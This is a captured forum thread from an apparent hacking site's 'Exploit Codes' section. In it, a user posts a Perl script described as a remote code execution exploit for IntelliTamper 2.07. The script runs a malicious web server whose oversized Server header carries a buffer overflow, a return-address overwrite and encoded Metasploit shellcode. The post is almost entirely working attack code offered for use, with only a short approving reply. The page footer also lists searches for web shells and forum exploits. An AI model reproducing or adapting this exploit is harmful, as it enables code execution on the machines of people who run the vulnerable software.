BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 07-23-2008   #1 (permalink)
Badhackerz
 
Join Date: Jul 2008

Posts: 531
Thanks: 99
Thanked 414 Times in 201 Posts
Rep Power: 85 Wh!5t|eR has a reputation beyond reputeWh!5t|eR has a reputation beyond repute
Wh!5t|eR has a reputation beyond repute
Thumbs up IntelliTamper 2.07 (server header) Remote Code Execution Exploit

IntelliTamper 2.07 (server header) Remote Code Execution Exploit

Quote:
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca 9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts executing here


# win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 The Metasploit Project
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\ x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\ x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\ x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\ x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\ x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\ x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\ x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\ x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\ x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\ x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\ x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\ x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\ x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\ x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\ x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\ x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\ x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\ x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\ x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\ x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\ x58\x71\x75\x37".
"\x70\x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Connection: close\r\n".
"Content-Length: 8\r\n".
"Date: Mon, 21 Jul 2008 2005 GMT\r\n".
"Content-Type: text/plain\r\n".
"Server: $buff\r\n".
"MIME-Version: 1.0\r\n\r\n".
"Exploit!\r\n";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );


print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";
Wh!5t|eR is online now  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Old 07-23-2008   #2 (permalink)
Respected Member
 
ZMist's Avatar
 
Join Date: Sep 2006

Location: Home
Posts: 1,336
Thanks: 3
Thanked 21 Times in 14 Posts
Rep Power: 115 ZMist is a splendid one to beholdZMist is a splendid one to beholdZMist is a splendid one to beholdZMist is a splendid one to beholdZMist is a splendid one to beholdZMist is a splendid one to beholdZMist is a splendid one to behold

Awards Showcase
1K group 
Total Awards: 1

Default

Keep It Up
__________________
CHECK
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
OUT
ZMist is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
LoveCMS 1.6.2 Final Remote Code Execution Exploit Wh!5t|eR Exploit Codes 0 08-07-2008 05:36 AM
TGS CMS Remote Code Execution Exploit Wh!5t|eR Exploit Codes 0 08-04-2008 02:56 AM
XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit Armageddon Exploit Codes 0 08-02-2008 11:56 PM
Pligg <= 9.9.0 Remote Code Execution Exploit Armageddon Exploit Codes 3 08-01-2008 04:20 PM
IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit Wh!5t|eR Exploit Codes 1 07-23-2008 08:27 PM

These are the 100 most searched terms
Search Cloud
"black and white 2" "megaupload" (intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack ambit250 bad hackerz badgewinners.com badhackerz badhackerz.com c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm dhcp sniffer evan poczik evllp.dll free tamil sex stories idm 512 imageshack clone infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader jdownloader.exe logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rosetta stone rapidshare rosetta stone romanian rosetta stone update rosetta stone v3 rapidshare safe-mode: off (not secure) drwxrwxrwx c99shell shila pandit sigma 1.7 softjtag tamil sex stories tamil sex story tamilsexstories tera patrick rapidshare vbulletin 3.7.0 exploit vbulletin exploit www.badhackerz.com ... powered by Simple Search Cloud

All times are GMT +5.5. The time now is 10:43 PM.


Website Design by How.ToDesignYour.Com
Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
vBCredits v1.4 Copyright ©2007 - 2008, PixelFX Studios